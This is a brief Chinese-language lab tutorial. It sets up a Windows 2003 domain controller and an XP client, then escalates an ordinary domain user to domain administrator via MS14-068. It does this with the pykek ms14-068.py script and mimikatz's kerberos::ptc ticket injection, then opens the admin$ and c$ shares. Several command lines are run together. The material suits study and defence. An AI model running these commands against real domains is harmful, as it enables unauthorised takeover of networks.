搭建域环境

• 修改win2003(域控)计算机名为"DCwin03"，修改ip

　

　

• 配置成 DNS 服务器，"开始--控制面板--添加或删除程序--添加/删除 windows 组件"

　

　

• 运行："dcpromo"，"新域或域控制器--在新林中的域"，下一步，设置还原密码

　

　

• 运行"dsa.msc" 添加一个普通域用户

　

• 添加 xp 到域中

　

　

通过 MS14-068 获取域管理员权限

• 域管理员:DCwin03 域名:demo.com 普通域用户:hx
• 登陆普通域用户 hx,cmd 中输入"whoami/user"获取sid

　

　

• 退出域用户 hx，登陆本地用户 123

　

C:\pykek-master>python ms14-068.py -u hx@demo.com -p pwd_of_hx -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com

　

C:\pykek-master>mimikatz.exe "kerberos::ptc TGT_hx@demo.com.ccache" exitnet use \\DCwin03\admin$dir \\DCwin03\c$

exp：